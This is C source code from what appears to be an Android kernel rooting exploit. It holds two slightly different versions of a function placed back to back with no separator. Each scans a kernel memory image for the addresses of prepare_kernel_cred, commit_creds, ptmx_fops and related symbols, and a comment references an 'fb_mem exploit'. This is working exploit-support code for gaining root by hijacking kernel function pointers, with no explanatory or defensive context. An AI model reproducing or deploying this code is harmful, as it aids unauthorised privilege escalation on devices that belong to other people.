static bool find_variables_in_memory(void *mem, size_t length) { kallsyms *info; printf("Search address in memory...\n"); info = kallsyms_in_memory_init(mem, length); if (info) { printf("Using kallsyms_in_memory...\n"); if (!prepare_kernel_cred) { prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); } if (!commit_creds) { commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); } if (!remap_pfn_range) { remap_pfn_range = (void *)kallsyms_in_memory_lookup_name(info, "remap_pfn_range"); } if (!vmalloc_exec) { vmalloc_exec = (void *)kallsyms_in_memory_lookup_name(info, "vmalloc_exec"); } if (!ptmx_fops) { ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); if (!ptmx_fops) { find_ptmx_fops_address(info, mem, length); } } kallsyms_in_memory_free(info); if (has_all_essential_addresses()) { return true; } } setup_prepare_kernel_cred_address_in_memory(mem, length); setup_commit_creds_address_in_memory(mem, length); return has_all_essential_addresses(); }
bool find_variables_in_memory(void *mem, size_t length) { kallsyms *info; printf("Search address in memroy...\n"); info = kallsyms_in_memory_init(mem, length); if (info) { printf("Using kallsyms_in_memroy...\n"); if (!prepare_kernel_cred) { prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); } if (!commit_creds) { commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); } if (!ptmx_fops) { ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); if (!ptmx_fops) { find_ptmx_fops_address(info, mem, length); } } //FIXME: do not free to avoid crash with fb_mem exploit //kallsyms_in_memory_free(info); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; } } setup_prepare_kernel_cred_address_in_memory(mem, length); setup_commit_creds_address_in_memory(mem, length); return prepare_kernel_cred && commit_creds && ptmx_fops; }